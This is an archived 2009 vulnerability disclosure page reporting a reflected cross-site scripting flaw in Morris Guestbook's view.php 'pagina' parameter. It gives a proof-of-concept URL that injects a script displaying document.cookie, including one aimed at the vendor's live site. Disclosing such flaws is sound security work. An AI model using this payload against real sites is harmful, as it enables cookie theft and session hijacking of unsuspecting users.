Morris Guestbook Cross Site Scripting

Morris Guestbook Cross Site Scripting: Posted Sep 16, 2009; Authored by Moudi; Morris Guestbook suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 4c3e22a88add72d66d36ccc178622619fbfd1e4bfe370c795ddc854599e4b507; Download | Favorite | View

Morris Guestbook Cross Site Scripting

/*

              _____       _ ___        __          
             | ____|_   _(_) \ \      / /_ _ _   _ 
             |  _| \ \ / / | |\ \ /\ / / _` | | | |
             | |___ \ V /| | | \ V  V / (_| | |_| |
             |_____| \_/ |_|_|  \_/\_/ \__,_|\__, |
                                              |___/ 
                                    _____                    
                                   |_   _|__  __ _ _ __ ___  
                                      | |/ _ \/ _` | '_ ` _ \ 
                                      | |  __/ (_| | | | | | |
                                      |_|\___|\__,_|_| |_| |_|

Morris Guestbook Remote XSS Vulnerabilities

Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : www.tuttophp.altervista.org

Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: http://unkn0wn.ws/board/index.php
Please visit: http://ghost-squall.com

*/

[+] Exploit XSS:

- Vulnerable code in view.php (pagina)

- Poc:
  http://127.0.0.1/view.php?pagina=[XSS]

  http://www.tuttophp.altervista.org/morrisguest-ing/view.php?pagina=1"><script>alert(document.cookie);</script>

Top Authors In Last 30 Days

Red Hat 293 files
Ubuntu 63 files
Debian 33 files
Gentoo 28 files
LiquidWorm 10 files
nu11secur1ty 7 files
Adam Gowdiak 4 files
kai6u 3 files
gabe_k 3 files
liquidsky 3 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,036)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,495)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,567)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,739)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,489)
UNIX (9,397)
UnixWare (187)
Windows (6,656)
Other

Morris Guestbook Cross Site Scripting

Morris Guestbook Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Morris Guestbook Cross Site Scripting

Share This

Morris Guestbook Cross Site Scripting

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems